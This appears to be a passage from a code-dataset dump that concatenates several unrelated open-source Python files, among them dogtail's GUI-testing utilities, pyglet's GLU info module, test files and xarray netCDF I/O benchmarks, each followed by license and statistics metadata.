def _configure_cb(self, view, width, height):
# redraw the mode indicator since the window has been resized
bm = view.get_bindmap()
mode, modetype = bm.current_mode()
self.mode_change_cb(bm, mode, modetype)
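# Illustrative usage sketch (added; not part of the original file):
#
#     viewer = ...                            # any Ginga ImageView{Toolkit} object
#     mode_indicator = ModeIndicator(viewer)  # keep a reference so it is not
#                                             # garbage collected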
#END
| bsd-3-clause | -5,227,700,311,220,240,000 | 30.728261 | 74 | 0.539226 | false |
Affix/fas | fas/__init__.py | 4 | 1997 | # -*- coding: utf-8 -*-
#
# Copyright © 2008 Ricky Zhou
# Copyright © 2008 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use, modify,
# copy, or redistribute it subject to the terms and conditions of the GNU
# General Public License v.2. This program is distributed in the hope that it
# will be useful, but WITHOUT ANY WARRANTY expressed or implied, including the
# implied warranties of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details. You should have
# received a copy of the GNU General Public License along with this program;
# if not, write to the Free Software Foundation, Inc., 51 Franklin Street,
# Fifth Floor, Boston, MA 02110-1301, USA. Any Red Hat trademarks that are
# incorporated in the source code or documentation are not subject to the GNU
# General Public License and may only be used or replicated with the express
# permission of Red Hat, Inc.
#
# Author(s): Ricky Zhou <[email protected]>
# Mike McGrath <[email protected]>
#
from fas import release
__version__ = release.VERSION
import gettext
translation = gettext.translation('fas', '/usr/share/locale',
fallback=True)
_ = translation.ugettext
SHARE_CC_GROUP = 'share_country_code'
SHARE_LOC_GROUP = 'share_location'
class FASError(Exception):
'''FAS Error'''
pass
class ApplyError(FASError):
'''Raised when a user could not apply to a group'''
pass
class ApproveError(FASError):
'''Raised when a user could not be approved in a group'''
pass
class SponsorError(FASError):
'''Raised when a user could not be sponsored in a group'''
pass
class UpgradeError(FASError):
'''Raised when a user could not be upgraded in a group'''
pass
class DowngradeError(FASError):
'''Raised when a user could not be downgraded in a group'''
pass
class RemoveError(FASError):
'''Raised when a user could not be removed from a group'''
pass
| gpl-2.0 | -2,755,481,522,752,891,000 | 32.813559 | 79 | 0.722306 | false |
Lorquas/dogtail | dogtail/utils.py | 2 | 14664 | # -*- coding: utf-8 -*-
"""
Various utilities
Authors: Ed Rousseau <[email protected]>, Zack Cerza <[email protected], David Malcolm <[email protected]>
"""
__author__ = """Ed Rousseau <[email protected]>,
Zack Cerza <[email protected],
David Malcolm <[email protected]>
"""
import os
import sys
import subprocess
import cairo
import predicate
import errno
import gi
gi.require_version('Gtk', '3.0')
gi.require_version('Gdk', '3.0')
from gi.repository import Gtk
from gi.repository import GObject
from config import config
from time import sleep
from logging import debugLogger as logger
from logging import TimeStamp
from __builtin__ import file
def screenshot(file='screenshot.png', timeStamp=True):
"""
    This function takes a screenshot of the root window using GdkPixbuf.
    The file argument may be specified as 'foo', 'foo.png', or using any other
    extension that GdkPixbuf can write. PNG is the default.
By default, screenshot filenames are in the format of foo_YYYYMMDD-hhmmss.png .
The timeStamp argument may be set to False to name the file foo.png.
"""
if not isinstance(timeStamp, bool):
raise TypeError("timeStampt must be True or False")
# config is supposed to create this for us. If it's not there, bail.
assert os.path.isdir(config.scratchDir)
baseName = ''.join(file.split('.')[0:-1])
fileExt = file.split('.')[-1].lower()
if not baseName:
baseName = file
fileExt = 'png'
if timeStamp:
ts = TimeStamp()
newFile = ts.fileStamp(baseName) + '.' + fileExt
path = config.scratchDir + newFile
else:
newFile = baseName + '.' + fileExt
path = config.scratchDir + newFile
from gi.repository import Gdk
from gi.repository import GObject
from gi.repository import GdkPixbuf
rootWindow = Gdk.get_default_root_window()
geometry = rootWindow.get_geometry()
pixbuf = GdkPixbuf.Pixbuf(colorspace=GdkPixbuf.Colorspace.RGB,
has_alpha=False,
bits_per_sample=8,
width=geometry[2],
height=geometry[3])
pixbuf = Gdk.pixbuf_get_from_window(rootWindow, 0, 0,
geometry[2], geometry[3])
# GdkPixbuf.Pixbuf.save() needs 'jpeg' and not 'jpg'
if fileExt == 'jpg':
fileExt = 'jpeg'
try:
pixbuf.savev(path, fileExt, [], [])
except GObject.GError:
raise ValueError("Failed to save screenshot in %s format" % fileExt)
assert os.path.exists(path)
logger.log("Screenshot taken: " + path)
return path
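# Illustrative usage (added; not part of the original file):
#
#     screenshot()                              # -> <scratchDir>/screenshot_YYYYMMDD-hhmmss.png
#     screenshot('login.jpg', timeStamp=False)  # -> <scratchDir>/login.jpg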
def run(string, timeout=config.runTimeout, interval=config.runInterval, desktop=None, dumb=False, appName=''):
"""
Runs an application. [For simple command execution such as 'rm *', use os.popen() or os.system()]
If dumb is omitted or is False, polls at interval seconds until the application is finished starting, or until timeout is reached.
If dumb is True, returns when timeout is reached.
"""
if not desktop:
from tree import root as desktop
args = string.split()
os.environ['GTK_MODULES'] = 'gail:atk-bridge'
pid = subprocess.Popen(args, env=os.environ).pid
if not appName:
appName = args[0]
if dumb:
# We're starting a non-AT-SPI-aware application. Disable startup
# detection.
doDelay(timeout)
else:
# Startup detection code
# The timing here is not totally precise, but it's good enough for now.
time = 0
while time < timeout:
time = time + interval
try:
for child in desktop.children[::-1]:
if child.name == appName:
for grandchild in child.children:
if grandchild.roleName == 'frame':
from procedural import focus
focus.application.node = child
doDelay(interval)
return pid
except AttributeError: # pragma: no cover
pass
doDelay(interval)
return pid
def doDelay(delay=None):
"""
Utility function to insert a delay (with logging and a configurable
default delay)
"""
if delay is None:
delay = config.defaultDelay
if config.debugSleep:
logger.log("sleeping for %f" % delay)
sleep(delay)
class Highlight (Gtk.Window): # pragma: no cover
def __init__(self, x, y, w, h): # pragma: no cover
super(Highlight, self).__init__()
self.set_decorated(False)
self.set_has_resize_grip(False)
self.set_default_size(w, h)
self.screen = self.get_screen()
self.visual = self.screen.get_rgba_visual()
if self.visual is not None and self.screen.is_composited():
self.set_visual(self.visual)
self.set_app_paintable(True)
self.connect("draw", self.area_draw)
self.show_all()
self.move(x, y)
def area_draw(self, widget, cr): # pragma: no cover
cr.set_source_rgba(.0, .0, .0, 0.0)
cr.set_operator(cairo.OPERATOR_SOURCE)
cr.paint()
cr.set_operator(cairo.OPERATOR_OVER)
cr.set_source_rgb(0.9, 0.1, 0.1)
cr.set_line_width(6)
cr.rectangle(0, 0, self.get_size()[0], self.get_size()[1])
cr.stroke()
class Blinker(object): # pragma: no cover
INTERVAL_MS = 1000
main_loop = GObject.MainLoop()
def __init__(self, x, y, w, h): # pragma: no cover
self.highlight_window = Highlight(x, y, w, h)
if self.highlight_window.screen.is_composited() is not False:
self.timeout_handler_id = GObject.timeout_add(
Blinker.INTERVAL_MS, self.destroyHighlight)
self.main_loop.run()
else:
self.highlight_window.destroy()
def destroyHighlight(self): # pragma: no cover
self.highlight_window.destroy()
self.main_loop.quit()
return False
class Lock(object):
"""
    A mutex implementation that relies on the atomicity of the mkdir operation on
    UNIX-like systems. Scripts can use it for mutual exclusion, either within a
    single script using threads etc., or to handle possible collisions among
    multiple running scripts. You can create randomized, per-script locks, or more
    general locks if you choose not to randomize the lockdir name.
"""
def __init__(self, location='/tmp', lockname='dogtail_lockdir_', randomize=True):
"""
You can change the default lockdir location or name. Setting randomize to
        False will result in no random string being appended to the lockdir name.
"""
self.lockdir = os.path.join(os.path.normpath(location), lockname)
if randomize:
self.lockdir = "%s%s" % (self.lockdir, self.__getPostfix())
def lock(self):
"""
        Creates a lockdir based on the settings given at Lock() instance creation.
        Raises an OSError exception if the lock is already present. Should be
atomic on POSIX compliant systems.
"""
locked_msg = 'Dogtail lock: Already locked with the same lock'
if not os.path.exists(self.lockdir):
try:
os.mkdir(self.lockdir)
return self.lockdir
except OSError as e:
if e.errno == errno.EEXIST and os.path.isdir(self.lockdir):
raise OSError(locked_msg)
else:
raise OSError(locked_msg)
def unlock(self):
"""
Removes a lock. Will raise OSError exception if the lock was not present.
Should be atomic on POSIX compliant systems.
"""
import os # have to import here for situations when executed from __del__
if os.path.exists(self.lockdir):
try:
os.rmdir(self.lockdir)
except OSError as e:
                if e.errno == errno.EEXIST:
raise OSError('Dogtail unlock: lockdir removed elsewhere!')
else:
raise OSError('Dogtail unlock: not locked')
def __del__(self):
"""
Makes sure lock is removed when the process ends. Although not when killed indeed.
"""
self.unlock()
def __getPostfix(self):
import random
import string
return ''.join(random.choice(string.letters + string.digits) for x in range(5))
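# Illustrative usage sketch (added; not part of the original file):
#
#     lock = Lock(lockname='my_script_lock_', randomize=False)
#     lock.lock()        # raises OSError if another instance already holds it
#     try:
#         pass           # critical section
#     finally:
#         lock.unlock()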
a11yDConfKey = 'org.gnome.desktop.interface'
def isA11yEnabled():
"""
Checks if accessibility is enabled via DConf.
"""
from gi.repository.Gio import Settings
InterfaceSettings = Settings(a11yDConfKey)
dconfEnabled = InterfaceSettings.get_boolean('toolkit-accessibility')
if os.environ.get('GTK_MODULES', '').find('gail:atk-bridge') == -1:
envEnabled = False
else:
envEnabled = True # pragma: no cover
return (dconfEnabled or envEnabled)
def bailBecauseA11yIsDisabled():
if sys.argv[0].endswith("pydoc"):
return # pragma: no cover
try:
if file("/proc/%s/cmdline" % os.getpid()).read().find('epydoc') != -1:
return # pragma: no cover
except: # pragma: no cover
pass # pragma: no cover
logger.log("Dogtail requires that Assistive Technology support be enabled."
"\nYou can enable accessibility with sniff or by running:\n"
"'gsettings set org.gnome.desktop.interface toolkit-accessibility true'\nAborting...")
sys.exit(1)
def enableA11y(enable=True):
"""
Enables accessibility via DConf.
"""
from gi.repository.Gio import Settings
InterfaceSettings = Settings(a11yDConfKey)
InterfaceSettings.set_boolean('toolkit-accessibility', enable)
def checkForA11y():
"""
Checks if accessibility is enabled, and halts execution if it is not.
"""
if not isA11yEnabled(): # pragma: no cover
bailBecauseA11yIsDisabled()
def checkForA11yInteractively(): # pragma: no cover
"""
Checks if accessibility is enabled, and presents a dialog prompting the
user if it should be enabled if it is not already, then halts execution.
"""
if isA11yEnabled():
return
from gi.repository import Gtk
dialog = Gtk.Dialog('Enable Assistive Technology Support?',
None,
Gtk.DialogFlags.MODAL | Gtk.DialogFlags.DESTROY_WITH_PARENT,
(Gtk.STOCK_QUIT, Gtk.ResponseType.CLOSE,
"_Enable", Gtk.ResponseType.ACCEPT))
question = """Dogtail requires that Assistive Technology Support be enabled for it to function. Would you like to enable Assistive Technology support now?
Note that you will have to log out for the change to fully take effect.
""".strip()
dialog.set_default_response(Gtk.ResponseType.ACCEPT)
questionLabel = Gtk.Label(label=question)
questionLabel.set_line_wrap(True)
dialog.vbox.pack_start(questionLabel, True, True, 0)
dialog.show_all()
result = dialog.run()
if result == Gtk.ResponseType.ACCEPT:
logger.log("Enabling accessibility...")
enableA11y()
elif result == Gtk.ResponseType.CLOSE:
bailBecauseA11yIsDisabled()
dialog.destroy()
class GnomeShell(object): # pragma: no cover
"""
Utility class to help working with certain atributes of gnome-shell.
Currently that means handling the Application menu available for apps
on the top gnome-shell panel. Searching for the menu and its items is
somewhat tricky due to fuzzy a11y tree of gnome-shell, mainly since the
actual menu is not present as child to the menu-spawning button. Also,
the menus get constructed/destroyed on the fly with application focus
changes. Thus current application name as displayed plus a reference
known menu item (with 'Quit' as default) are required by these methods.
"""
def __init__(self, classic_mode=False):
from tree import root
self.shell = root.application('gnome-shell')
def getApplicationMenuList(self, search_by_item='Quit'):
"""
Returns list of all menu item nodes. Searches for the menu by a reference item.
Provide a different item name, if the 'Quit' is not present - but beware picking one
present elsewhere, like 'Lock' or 'Power Off' present under the user menu.
"""
matches = self.shell.findChildren(
predicate.GenericPredicate(name=search_by_item, roleName='label'))
for match in matches:
ancestor = match.parent.parent.parent
if ancestor.roleName == 'panel':
return ancestor.findChildren(predicate.GenericPredicate(roleName='label'))
from tree import SearchError
raise SearchError("Could not find the Application menu based on '%s' item. Please provide an existing reference item"
% search_by_item)
def getApplicationMenuButton(self, app_name):
"""
Returns the application menu 'button' node as present on the gnome-shell top panel.
"""
try:
return self.shell[0][0][3].child(app_name, roleName='label')
except:
from tree import SearchError
raise SearchError(
"Application menu button of %s could not be found within gnome-shell!" % app_name)
def getApplicationMenuItem(self, item, search_by_item='Quit'):
"""
        Returns a particular menu item node. Uses the default 'Quit' (or a custom item name) for reference, but also
        attempts to use the given item if the general reference fails.
"""
try:
menu_items = self.getApplicationMenuList(search_by_item)
except:
menu_items = self.getApplicationMenuList(item)
for node in menu_items:
if node.name == item:
return node
raise Exception(
'Could not find the item, did application focus change?')
def clickApplicationMenuItem(self, app_name, item, search_by_item='Quit'):
"""
Executes the given menu item through opening the menu first followed
by a click at the particular item. The menu search reference 'Quit'
may be customized. Also attempts to use the given item for reference
if search fails with the default/custom one.
"""
self.getApplicationMenuButton(app_name).click()
self.getApplicationMenuItem(item, search_by_item).click()
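# Illustrative usage sketch (added; not part of the original file):
#
#     shell = GnomeShell()
#     # open the 'gedit' menu on the top panel and activate its 'Quit' item
#     shell.clickApplicationMenuItem('gedit', 'Quit')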
| gpl-2.0 | 6,725,907,460,787,986,000 | 36.218274 | 158 | 0.628819 | false |
nemesiscodex/sugar | tests/views/activitieslist.py | 11 | 1715 | # Copyright (C) 2013, Daniel Narvaez
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os
from gi.repository import Gtk
from dbus.mainloop.glib import DBusGMainLoop
DBusGMainLoop(set_as_default=True)
from jarabe.desktop.activitieslist import ActivityListPalette
tests_dir = os.getcwd()
base_dir = os.path.dirname(tests_dir)
data_dir = os.path.join(tests_dir, "data")
class MockActivityInfo:
def get_bundle_id(self):
return "mock"
def get_activity_version(self):
return 1
def get_is_favorite(self):
return False
def get_icon(self):
return os.path.join(data_dir, "activity.svg")
def get_name(self):
return "mock"
def get_path(self):
return "mock"
def is_user_activity(self):
return True
os.environ["SUGAR_ACTIVITIES_DEFAULTS"] = \
os.path.join(base_dir, "data", "activities.defaults")
os.environ["SUGAR_MIME_DEFAULTS"] = \
os.path.join(base_dir, "data", "mime.defaults")
palette = ActivityListPalette(MockActivityInfo())
palette.popup()
Gtk.main()
| gpl-2.0 | 5,076,711,548,262,022,000 | 26.66129 | 76 | 0.714869 | false |
dbarsam/python-vsgen | tests/integration/test_package_integration.py | 1 | 2129 | # -*- coding: utf-8 -*-
"""
This module provides all integration test for the package functionality.
"""
import sys
import os
import importlib
import shutil
import unittest
import logging
def setUpModule():
"""
The module specific setUp method
"""
logging.disable(logging.CRITICAL)
def tearDownModule():
"""
The module specific tearDown method
"""
logging.disable(logging.NOTSET)
class TestIntegrationPackage(unittest.TestCase):
"""
Tests the Solution and Project Generation from a python package file.
"""
def setUp(self):
"""
The class specific setUp method
"""
self._data = os.path.normpath(os.path.join(os.path.dirname(__file__), '..', 'data'))
self.assertTrue(os.path.isdir(self._data), 'Test data directory "{}" does not exist'.format(self._data))
self._output = os.path.normpath(os.path.join(self._data, '_output'))
        self.assertFalse(os.path.exists(self._output), 'Test output directory "{}" already exists!'.format(self._output))
self._package = os.path.normpath(os.path.join(self._data, 'vsgendemo'))
self.assertTrue(os.path.isdir(self._package), 'Test package "{}" does not exist'.format(self._package))
        # Append the package's root directory to sys.path
rootdir = os.path.dirname(self._package)
if rootdir not in sys.path:
sys.path.append(rootdir)
def tearDown(self):
"""
The class specific tearDown method
"""
# Remove the package from the sys path
rootdir = os.path.dirname(self._package)
if rootdir in sys.path:
sys.path.remove(rootdir)
# Remove the output directory
if os.path.exists(self._output):
shutil.rmtree(self._output)
def test_package_success(self):
"""
Tests the expected workflow.
"""
package_name = os.path.basename(self._package)
main_module = importlib.import_module("{}.__main__".format(package_name))
result = main_module.main()
self.assertEqual(result, 0)
if __name__ == '__main__':
unittest.main()
| mit | 1,753,113,812,343,618,000 | 27.77027 | 115 | 0.622828 | false |
regular/pyglet-avbin-optimizations | pyglet/gl/glu_info.py | 5 | 5637 | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Information about version and extensions of current GLU implementation.
Usage::
from pyglet.gl import glu_info
if glu_info.have_extension('GLU_EXT_nurbs_tessellator'):
# ...
If multiple contexts are in use you can use a separate GLUInfo object for each
context. Call `set_active_context` after switching to the desired context for
each GLUInfo::
from pyglet.gl.glu_info import GLUInfo
info = GLUInfo()
info.set_active_context()
if info.have_version(1, 3):
# ...
Note that GLUInfo only returns meaningful information if a context has been
created.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
from ctypes import *
import warnings
from pyglet.gl.glu import *
class GLUInfo(object):
'''Information interface for the GLU library.
A default instance is created automatically when the first OpenGL context
is created. You can use the module functions as a convenience for
this default instance's methods.
If you are using more than one context, you must call `set_active_context`
when the context is active for this `GLUInfo` instance.
'''
have_context = False
version = '0.0.0'
extensions = []
_have_info = False
def set_active_context(self):
'''Store information for the currently active context.
This method is called automatically for the default context.
'''
self.have_context = True
if not self._have_info:
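            # GLU reports its extensions as one space-separated string; split it
            # into a list so have_extension() can do membership tests.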
self.extensions = \
cast(gluGetString(GLU_EXTENSIONS), c_char_p).value.split()
self.version = cast(gluGetString(GLU_VERSION), c_char_p).value
self._have_info = True
def have_version(self, major, minor=0, release=0):
'''Determine if a version of GLU is supported.
:Parameters:
`major` : int
The major revision number (typically 1).
`minor` : int
The minor revision number.
`release` : int
The release number.
:rtype: bool
:return: True if the requested or a later version is supported.
'''
if not self.have_context:
warnings.warn('No GL context created yet.')
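        # The version string may carry vendor text after a space; pad with
        # '.0.0' so short versions such as '1.3' still yield three integers.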
ver = '%s.0.0' % self.version.split(' ', 1)[0]
imajor, iminor, irelease = [int(v) for v in ver.split('.', 3)[:3]]
return imajor > major or \
(imajor == major and iminor > minor) or \
(imajor == major and iminor == minor and irelease >= release)
def get_version(self):
'''Get the current GLU version.
:return: the GLU version
:rtype: str
'''
if not self.have_context:
warnings.warn('No GL context created yet.')
return self.version
def have_extension(self, extension):
'''Determine if a GLU extension is available.
:Parameters:
`extension` : str
The name of the extension to test for, including its
``GLU_`` prefix.
:return: True if the extension is provided by the implementation.
:rtype: bool
'''
if not self.have_context:
warnings.warn('No GL context created yet.')
return extension in self.extensions
def get_extensions(self):
'''Get a list of available GLU extensions.
:return: a list of the available extensions.
:rtype: list of str
'''
if not self.have_context:
warnings.warn('No GL context created yet.')
return self.extensions
# Single instance useful for apps with only a single context (or all contexts
# have same GLU driver, common case).
_glu_info = GLUInfo()
set_active_context = _glu_info.set_active_context
have_version = _glu_info.have_version
get_version = _glu_info.get_version
have_extension = _glu_info.have_extension
get_extensions = _glu_info.get_extensions
| bsd-3-clause | 6,305,670,326,180,828,000 | 34.23125 | 78 | 0.646443 | false |
ltucker/melk.util | tests/test_idict.py | 1 | 1949 | from melk.util.idict import idict
def test_idict():
foo = idict()
foo['bar'] = 'quux'
assert len(foo) == 1
assert foo['bar'] == 'quux'
assert foo['BaR'] == 'quux'
assert 'bar' in foo
assert foo.has_key('bar')
assert 'bAr' in foo
assert foo.has_key('bAr')
assert not 'buhloney' in foo
assert not foo.has_key('bahloney')
foo['BaR'] = 'baz'
assert len(foo) == 1
assert 'bar' in foo
assert foo.has_key('bar')
assert foo['bar'] == 'baz'
del foo['BaR']
assert not 'bar' in foo
assert not foo.has_key('bar')
assert not 'BaR' in foo
assert not foo.has_key('BaR')
def test_idict_init_kw():
foo = idict(Bar='quux', bAz='zoom')
assert 'bar' in foo
assert foo.has_key('bar')
assert foo['bar'] == 'quux'
assert foo['BaR'] == 'quux'
assert 'baz' in foo
assert foo.has_key('baz')
assert foo['baz'] == 'zoom'
assert foo['BaZ'] == 'zoom'
def test_idict_tuple_construct():
foo = idict([('a', 'b'), ('C', 'd')])
assert 'a' in foo
assert foo.has_key('a')
assert 'A' in foo
assert foo.has_key('A')
assert 'c' in foo
assert foo.has_key('c')
assert 'C' in foo
assert foo.has_key('C')
def test_idict_tuple_update():
foo = idict()
foo.update([('a', 'b'), ('C', 'd')])
assert 'a' in foo
assert 'A' in foo
assert 'c' in foo
assert 'C' in foo
def test_idict_new_norm():
class Prefix4(str):
def __hash__(self):
return hash(self[0:4])
def __eq__(self, other):
return self[0:4] == other[0:4]
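    # With this Norm class, keys hash and compare on their first four
    # characters only, so idict treats 'foobia' and 'foobarar' as the same key.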
class PrefixDict(idict):
def __init__(self, *args, **kwargs):
self.Norm = Prefix4
idict.__init__(self, *args, **kwargs)
pd = PrefixDict()
pd['foobia'] = 'bar'
assert 'foobia' in pd
assert 'foobarar' in pd
assert pd['foobsrushinwherebarsfeartotread'] == 'bar'
| gpl-2.0 | 7,594,771,713,812,477,000 | 22.768293 | 57 | 0.539251 | false |
jcmgray/xarray | asv_bench/benchmarks/dataset_io.py | 1 | 15612 | from __future__ import absolute_import, division, print_function
import numpy as np
import pandas as pd
import xarray as xr
from . import randn, randint, requires_dask
try:
import dask
import dask.multiprocessing
except ImportError:
pass
class IOSingleNetCDF(object):
"""
A few examples that benchmark reading/writing a single netCDF file with
xarray
"""
timeout = 300.
repeat = 1
number = 5
def make_ds(self):
# single Dataset
self.ds = xr.Dataset()
self.nt = 1000
self.nx = 90
self.ny = 45
self.block_chunks = {'time': self.nt / 4,
'lon': self.nx / 3,
'lat': self.ny / 3}
self.time_chunks = {'time': int(self.nt / 36)}
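        # block_chunks splits the data along all three dimensions, while
        # time_chunks chunks along the time axis only.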
times = pd.date_range('1970-01-01', periods=self.nt, freq='D')
lons = xr.DataArray(np.linspace(0, 360, self.nx), dims=('lon', ),
attrs={'units': 'degrees east',
'long_name': 'longitude'})
lats = xr.DataArray(np.linspace(-90, 90, self.ny), dims=('lat', ),
attrs={'units': 'degrees north',
'long_name': 'latitude'})
self.ds['foo'] = xr.DataArray(randn((self.nt, self.nx, self.ny),
frac_nan=0.2),
coords={'lon': lons, 'lat': lats,
'time': times},
dims=('time', 'lon', 'lat'),
name='foo', encoding=None,
attrs={'units': 'foo units',
'description': 'a description'})
self.ds['bar'] = xr.DataArray(randn((self.nt, self.nx, self.ny),
frac_nan=0.2),
coords={'lon': lons, 'lat': lats,
'time': times},
dims=('time', 'lon', 'lat'),
name='bar', encoding=None,
attrs={'units': 'bar units',
'description': 'a description'})
self.ds['baz'] = xr.DataArray(randn((self.nx, self.ny),
frac_nan=0.2).astype(np.float32),
coords={'lon': lons, 'lat': lats},
dims=('lon', 'lat'),
name='baz', encoding=None,
attrs={'units': 'baz units',
'description': 'a description'})
self.ds.attrs = {'history': 'created for xarray benchmarking'}
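        # oinds drives orthogonal (outer) indexing benchmarks; vinds uses
        # DataArrays sharing the 'x' dimension for vectorized (pointwise) indexing.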
self.oinds = {'time': randint(0, self.nt, 120),
'lon': randint(0, self.nx, 20),
'lat': randint(0, self.ny, 10)}
self.vinds = {'time': xr.DataArray(randint(0, self.nt, 120),
dims='x'),
'lon': xr.DataArray(randint(0, self.nx, 120),
dims='x'),
'lat': slice(3, 20)}
class IOWriteSingleNetCDF3(IOSingleNetCDF):
def setup(self):
self.format = 'NETCDF3_64BIT'
self.make_ds()
def time_write_dataset_netcdf4(self):
self.ds.to_netcdf('test_netcdf4_write.nc', engine='netcdf4',
format=self.format)
def time_write_dataset_scipy(self):
self.ds.to_netcdf('test_scipy_write.nc', engine='scipy',
format=self.format)
class IOReadSingleNetCDF4(IOSingleNetCDF):
def setup(self):
self.make_ds()
self.filepath = 'test_single_file.nc4.nc'
self.format = 'NETCDF4'
self.ds.to_netcdf(self.filepath, format=self.format)
def time_load_dataset_netcdf4(self):
xr.open_dataset(self.filepath, engine='netcdf4').load()
def time_orthogonal_indexing(self):
ds = xr.open_dataset(self.filepath, engine='netcdf4')
ds = ds.isel(**self.oinds).load()
def time_vectorized_indexing(self):
ds = xr.open_dataset(self.filepath, engine='netcdf4')
ds = ds.isel(**self.vinds).load()
class IOReadSingleNetCDF3(IOReadSingleNetCDF4):
def setup(self):
self.make_ds()
self.filepath = 'test_single_file.nc3.nc'
self.format = 'NETCDF3_64BIT'
self.ds.to_netcdf(self.filepath, format=self.format)
def time_load_dataset_scipy(self):
xr.open_dataset(self.filepath, engine='scipy').load()
def time_orthogonal_indexing(self):
ds = xr.open_dataset(self.filepath, engine='scipy')
ds = ds.isel(**self.oinds).load()
def time_vectorized_indexing(self):
ds = xr.open_dataset(self.filepath, engine='scipy')
ds = ds.isel(**self.vinds).load()
class IOReadSingleNetCDF4Dask(IOSingleNetCDF):
def setup(self):
requires_dask()
self.make_ds()
self.filepath = 'test_single_file.nc4.nc'
self.format = 'NETCDF4'
self.ds.to_netcdf(self.filepath, format=self.format)
def time_load_dataset_netcdf4_with_block_chunks(self):
xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.block_chunks).load()
def time_load_dataset_netcdf4_with_block_chunks_oindexing(self):
ds = xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.block_chunks)
ds = ds.isel(**self.oinds).load()
def time_load_dataset_netcdf4_with_block_chunks_vindexing(self):
ds = xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.block_chunks)
ds = ds.isel(**self.vinds).load()
def time_load_dataset_netcdf4_with_block_chunks_multiprocessing(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.block_chunks).load()
def time_load_dataset_netcdf4_with_time_chunks(self):
xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.time_chunks).load()
def time_load_dataset_netcdf4_with_time_chunks_multiprocessing(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_dataset(self.filepath, engine='netcdf4',
chunks=self.time_chunks).load()
class IOReadSingleNetCDF3Dask(IOReadSingleNetCDF4Dask):
def setup(self):
requires_dask()
self.make_ds()
self.filepath = 'test_single_file.nc3.nc'
self.format = 'NETCDF3_64BIT'
self.ds.to_netcdf(self.filepath, format=self.format)
def time_load_dataset_scipy_with_block_chunks(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_dataset(self.filepath, engine='scipy',
chunks=self.block_chunks).load()
def time_load_dataset_scipy_with_block_chunks_oindexing(self):
ds = xr.open_dataset(self.filepath, engine='scipy',
chunks=self.block_chunks)
ds = ds.isel(**self.oinds).load()
def time_load_dataset_scipy_with_block_chunks_vindexing(self):
ds = xr.open_dataset(self.filepath, engine='scipy',
chunks=self.block_chunks)
ds = ds.isel(**self.vinds).load()
def time_load_dataset_scipy_with_time_chunks(self):
with dask.set_options(get=dask.multiprocessing.get):
xr.open_dataset(self.filepath, engine='scipy',
chunks=self.time_chunks).load()
class IOMultipleNetCDF(object):
"""
A few examples that benchmark reading/writing multiple netCDF files with
xarray
"""
timeout = 300.
repeat = 1
number = 5
def make_ds(self, nfiles=10):
# multiple Dataset
self.ds = xr.Dataset()
self.nt = 1000
self.nx = 90
self.ny = 45
self.nfiles = nfiles
self.block_chunks = {'time': self.nt / 4,
'lon': self.nx / 3,
'lat': self.ny / 3}
self.time_chunks = {'time': int(self.nt / 36)}
self.time_vars = np.split(
pd.date_range('1970-01-01', periods=self.nt, freq='D'),
self.nfiles)
self.ds_list = []
self.filenames_list = []
for i, times in enumerate(self.time_vars):
ds = xr.Dataset()
nt = len(times)
lons = xr.DataArray(np.linspace(0, 360, self.nx), dims=('lon', ),
attrs={'units': 'degrees east',
'long_name': 'longitude'})
lats = xr.DataArray(np.linspace(-90, 90, self.ny), dims=('lat', ),
attrs={'units': 'degrees north',
'long_name': 'latitude'})
ds['foo'] = xr.DataArray(randn((nt, self.nx, self.ny),
frac_nan=0.2),
coords={'lon': lons, 'lat': lats,
'time': times},
dims=('time', 'lon', 'lat'),
name='foo', encoding=None,
attrs={'units': 'foo units',
'description': 'a description'})
ds['bar'] = xr.DataArray(randn((nt, self.nx, self.ny),
frac_nan=0.2),
coords={'lon': lons, 'lat': lats,
'time': times},
dims=('time', 'lon', 'lat'),
name='bar', encoding=None,
attrs={'units': 'bar units',
'description': 'a description'})
ds['baz'] = xr.DataArray(randn((self.nx, self.ny),
